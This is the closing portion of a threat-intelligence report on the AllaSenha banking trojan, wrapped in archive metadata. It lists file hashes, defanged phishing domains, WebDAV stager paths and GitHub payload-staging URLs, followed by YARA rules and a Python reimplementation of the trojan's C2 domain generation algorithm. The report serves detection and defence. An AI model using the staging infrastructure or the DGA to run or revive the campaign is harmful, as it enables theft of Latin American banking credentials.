AllaSenha\r\nb152346c2679392d7e15d1cc72a39a21d24e55360c4c1c845ef3524924e93fa9|AllaSenha\r\n7232e3318fdc370e611b2bcbaaec3d58a0d687927714c24dc81fe60767d53a31|AllaSenha\r\n883c49b7c869019951eff94699480a7ecc97c9c45060a15797ecbd5fce060d26|AllaSenha\r\n561e6a42e23d12abe6bba8c98f84c3ba7c45a5df840bfa6fd0dfea803c9b4b7e|AllaSenha\r\nab3a284ae6e4e466a0715c162cfab85d75522bec48fa25947b16a0891ec2358a|AllaSenha\r\n278897ee9158f9843125bc2e26c14f96c4e79d5fc578b7e5973dc8dc919a3400|AllaSenha\r\n3c89775ae7c35fe3d1ec7e75ac9d4a19959d082d31ab412af243125440ffea6c|AllaSenha\r\nhttps://harfanglab.io/insidethelab/allasenha-allakore-variant-azure-c2-steal-banking-latin-america/\r\nPage 11 of 14\n\nDomains\r\nnfe-digital[.]digital|Phishing URLs root domain\r\nnfe-digital[.]top|Phishing URLs root domain\r\nPossibly malicious and/or associated domains\r\nnfe-digital[.]online|Possibly malicious and/or associated domain\r\nnfe-digital[.]site|Possibly malicious and/or associated domain\r\nURLs\r\n\\\\abrir-documento-adobe-reader-1.brazilsouth.cloudapp.azure[.]com@80\\Documentos\\|WebDAV stager path (on legitimate Azure\r\n\\\\104.41.57[.]122@80\\Documentos\\|WebDAV stager path (on legitimate Azure infrastructure)\r\n\\\\191.235.235[.]69@80\\Documentos\\|WebDAV stager path (on legitimate Azure infrastructure)\r\n\\\\4.203.105[.]118@80\\Documentos\\|WebDAV stager path (on legitimate Azure infrastructure)\r\n\\\\191.234.212[.]140@80\\Documentos\\|WebDAV stager path (on legitimate Azure infrastructure)\r\n\\\\191.233.241[.]96@80\\Documentos\\|WebDAV stager path (on legitimate Azure infrastructure)\r\n\\\\191.232.38[.]222@80\\Documentos\\|WebDAV stager path (on legitimate Azure infrastructure)\r\n\\\\191.239.116[.]217@80\\Documentos\\|WebDAV stager path (on legitimate Azure infrastructure)\r\n\\\\104.41.51[.]80@80\\Documentos\\|WebDAV stager path (on legitimate Azure infrastructure)\r\n\\\\191.235.233[.]246@80\\Documentos\\|WebDAV stager path (on legitimate Azure infrastructure)\r\n\\\\191.233.248[.]170@80\\Documentos\\|WebDAV stager path (on legitimate Azure infrastructure)\r\n\\\\191.239.123[.]241@80\\Documentos\\|WebDAV stager path (on legitimate Azure infrastructure)\r\n\\\\191.235.87[.]229@80\\Documentos\\|WebDAV stager path (on legitimate Azure infrastructure)\r\n\\\\20.197.250[.]132@80\\Documentos\\|WebDAV stager path (on legitimate Azure infrastructure)\r\nhxxps://raw.githubusercontent[.]com/marinabarros320168/new/main/Execute_dll.exe|ExecutorLoader staging URL (on legitimate\r\nhxxps://raw.githubusercontent[.]com/alexiadarocha195267/rp/raw/main/Execute_dll.zip|ExecutorLoader staging URL (on legitim\r\nhxxp://jucatyo6.autodesk360[.]com/shares/download/file/SHd38bfQT1fb47330c999c2a86b9a6d091b6/dXJuOmFkc2sud2lwcHJvZDpmcy5maW\r\nhxxps://dpsols7.autodesk360[.]com/shares/download/file/SHd38bfQT1fb47330c99c55d44aacebd2ec7/dXJuOmFkc2sud2lwcHJvZDpmcy5maW\r\nYARA rules\r\nrule allasenhamaycampaign_executorloader\r\n{\r\n meta:\r\n description = \"Detects Delphi ExecutorLoader DLLs and executables.\"\r\n references = \"TRR240501\"\r\n date = \"2024-05-28\"\r\n author = \"HarfangLab\"\r\n context = \"file,memory\"\r\n strings:\r\n $delphi = \"Embarcadero Delphi\" ascii fullword\r\n $s1 = \"\\\\SysWOW64\\\\mshta.exe\" wide fullword\r\n $s2 = \"\\\\System32\\\\mshta.exe\" wide fullword\r\n $s3 = \"RcDll\" wide fullword\r\n $default1 = \"Default_\" wide fullword\r\n $default2 = \"Default~\" wide fullword\r\n condition:\r\n $delphi\r\n and all of ($s*)\r\n and any of ($default*)\r\n}\r\nrule allasenhamaycampaign_allasenha\r\n{\r\n meta:\r\n description = \"Detects AllaSenha banking trojan DLLs.\"\r\n references = \"TRR240501\"\r\nhttps://harfanglab.io/insidethelab/allasenha-allakore-variant-azure-c2-steal-banking-latin-america/\r\nPage 12 of 14\n\ndate = \"2024-05-28\"\r\n author = \"HarfangLab\"\r\n context = \"file,memory\"\r\n strings:\r\n $a1 = \"\u003c|NOSenha|\u003e\" wide fullword\r\n $a2 = \"\u003c|SENHA|\u003eQrCode: \" wide fullword\r\n $a3 = \"\u003c|SENHA|\u003eSenha 6 : \" wide fullword\r\n $a4 = \"\u003c|SENHA|\u003eSnh: \" wide fullword\r\n $a5 = \"\u003c|SENHA|\u003eToken: \" wide fullword\r\n $a6 = \"\u003c|BB-AMARELO|\u003e\" wide fullword\r\n $a7 = \"\u003c|BB-AZUL|\u003e\" wide fullword\r\n $a8 = \"\u003c|BB-PROCURADOR|\u003e\" wide fullword\r\n $a9 = \"\u003c|ITAU-SNH-CARTAO|\u003e\" wide fullword\r\n $a10 = \"\u003c|ITAU-TK-APP|\u003e\" wide fullword\r\n $dga = { 76 00 00 00 B0 04 02 00 FF FF FF FF 01 00 00 00 78 00 00 00 B0 04 02 00 FF FF FF FF 01 00 00 00 7A 00 00\r\n condition:\r\n $dga\r\n and (4 of ($a*))\r\n}\r\nAllaSenha DGA\r\nThis Python code snippet is reproducing the logic of AllaSenha’s domain generation algorithm (which is generating C2\r\nhostnames).\r\nimport datetime\r\ndef day_to_letter(i):\r\n if i \u003e 26:\r\n i //= 2\r\n return \"_abcdefghijlmnopqrstuvxzwky\"[i]\r\ndef to_signed_str(unsigned_value):\r\n \"\"\"\r\n Converts an integer into the corresponding signed value, returned as a string.\r\n :param unsigned_value: The input integer to convert\r\n :return: The corresponding string\r\n \"\"\"\r\n bit_length = 32\r\n if unsigned_value \u003e= 2**(bit_length - 1):\r\n signed_value = unsigned_value - 2**bit_length\r\n else:\r\n signed_value = unsigned_value\r\n return str(signed_value)\r\ndef intstr_to_domain(s):\r\n \"\"\"\r\n The input is a string which contains only digits. This function takes them either one or two at a time\r\n to be used as indexes in a hardcoded array. If taking two digits makes for too big an index, only one\r\n is used - this explains the huge disparity in the distribution of letters.\r\n :param s:\r\n :return:\r\n \"\"\"\r\n key = \"__abcdefghijlmnopqrstuvxzwky\"\r\n out = \"\"\r\n i = 0\r\n while i \u003c len(s):\r\n if i == len(s) - 1 or int(s[i:i+2]) \u003e= 28:\r\n if int(s[i:i+1]) \u003e= 2:\r\n out += key[int(s[i])]\r\n i += 1\r\n else:\r\nhttps://harfanglab.io/insidethelab/allasenha-allakore-variant-azure-c2-steal-banking-latin-america/\r\nPage 13 of 14\n\nif int(s[i:i+2]) \u003e= 2:\r\n out += key[int(s[i:i+2])]\r\n i += 2\r\n return out.rstrip('_')\r\nd = datetime.datetime(year=2024, month=5, day=28) # Change to the desired date\r\nday_of_year = d.timetuple().tm_yday\r\nday_of_week = (d.weekday() + 1) % 7 + 1\r\nweek_of_year = d.isocalendar()[1]\r\ndomain = day_to_letter(d.day)\r\nkey = {\r\n \"ITAU-APP\": 0x55,\r\n \"BB\": 0x56,\r\n \"default\": 0x57\r\n}\r\nmultiplicator = key[\"default\"]\r\ncalculus1 = d.day**2 * day_of_year * multiplicator**3 \u0026 0xFFFFFFFF\r\ncalculus2 = day_of_year**2 * d.day * multiplicator \u0026 0xFFFFFFFF\r\ncalculus3 = day_of_year * d.day * multiplicator \u0026 0xFFFFFFFF\r\ncalculus4 = d.month * day_of_year * d.day * multiplicator \u0026 0xFFFFFFFF\r\ncalculus5 = week_of_year * day_of_year * d.day * multiplicator \u0026 0xFFFFFFFF\r\ninput_str = (f\"{to_signed_str(calculus1)}{to_signed_str(calculus2)}{to_signed_str(calculus3)}{to_signed_str(calculus4)}\"\r\n f\"{to_signed_str(calculus5)}{to_signed_str(calculus5)}\")\r\nprint(domain + intstr_to_domain(input_str) + \".brazilsouth.cloudapp.azure[.]com\")\r\n1. https://github.com/OneideLuizSchneider/AllaKore_Remote ↩ ↩\r\n2. The default PDF reader should not be able to display the created PDF file, as it is not a valid PDF. ↩\r\n3. The generated name is the lowercased and reversed local name of the targeted machine, without dashes characters,\r\nand without the “DESKTOP” word if any. ↩ ↩\r\n4. https://learn.microsoft.com/en-us/azure/azure-functions/functions-overview?pivots=programming-language-csharp ↩\r\n5. https://docs.python.org/3/library/pickle.html ↩\r\n6. https://github.com/naksyn/PythonMemoryModule ↩\r\n7. https://github.com/haithemnini/ServerSocket ↩\r\n8. https://github.com/oxahax/Brazilian-Malwares/tree/master/Pascal-Delphi/KL-REMOTA-KL/KL%20Gorki ↩\r\n9. https://blogs.blackberry.com/en/2024/01/mexican-banks-and-cryptocurrency-platforms-targeted-with-allakore-rat ↩\r\n10. https://www.cybereason.com/blog/research/brazilian-financial-malware-banking-europe-south-america ↩\r\n11. https://www.gov.br/nfse/pt-br/copy_of_perguntas-frequentes/copy_of_faq-nfs-e ↩\r\n12. https://github.com/executemalware/Malware-IOCs/blob/main/2023-11-28%20Possible%20DBatLoader%20IOCs,\r\nNB: in spite of the claims from this reference, we could not associate the infection chain and payloads that we\r\ndescribe with DBatLoader ↩\r\n13. https://learn.microsoft.com/en-us/windows/win32/shell/search-protocol#examples ↩\r\n14. https://www.hostgator.com.br/ ↩\r\nSource: https://harfanglab.io/insidethelab/allasenha-allakore-variant-azure-c2-steal-banking-latin-america/\r\nhttps://harfanglab.io/insidethelab/allasenha-allakore-variant-azure-c2-steal-banking-latin-america/\r\nPage 14 of 14",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://harfanglab.io/insidethelab/allasenha-allakore-variant-azure-c2-steal-banking-latin-america/"
	],
	"report_names": [
		"allasenha-allakore-variant-azure-c2-steal-banking-latin-america"
	],
	"threat_actors": [],
	"ts_created_at": 1775791200,
	"ts_updated_at": 1775791337,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6ff0c82c4cbb94cdfd6e579550a69b7d15bbae67.pdf",
		"text": "https://archive.orkl.eu/6ff0c82c4cbb94cdfd6e579550a69b7d15bbae67.txt",
		"img": "https://archive.orkl.eu/6ff0c82c4cbb94cdfd6e579550a69b7d15bbae67.jpg"
	}
}